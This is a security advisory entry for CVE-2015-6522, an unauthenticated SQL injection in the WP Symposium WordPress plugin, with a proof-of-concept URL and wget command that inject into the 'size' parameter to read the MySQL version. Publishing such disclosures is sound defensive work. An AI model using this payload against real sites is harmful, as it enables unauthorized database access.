WP Symposium < 15.8 – Unauthenticated SQL Injection | CVE 2015-6522 | Plugin Vulnerabilities

Description

Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php, parameter 'size'.

The issue is exploitable even if the plugin is deactivated.

Proof of Concept

PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--

PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1

Affects Plugins

Fixed in 15.8

References

CVE

Exploitdb

URL

https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

PizzaHatHacker

Verified

Yes

WPVDB ID

f9f78241-8911-485e-9e18-a3da1096220c

Timeline

Publicly Published

2015-08-09 (about 10 years ago)

Added

2015-08-09 (about 10 years ago)

Last Updated

2019-10-22 (about 6 years ago)

Other

Published

Title

Published

2025-10-14

Title

onOffice for WP-Websites < 6.10 - Authenticated (Editor+) SQL Injection

Published

2024-06-19

Title

Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress < 1.2.6 - Authenticated (Contributor+) SQL Injection

Published

2022-12-05

Title

Contest Gallery < 19.1.5.1 - Author+ SQL Injection

Published

2023-01-24

Title

LearnPress Plugin < 4.2.0 - Unauthenticated SQLi

Published

2021-06-29

Title

Quiz Maker < 6.2.0.9 - Multiple Authenticated Blind SQL Injections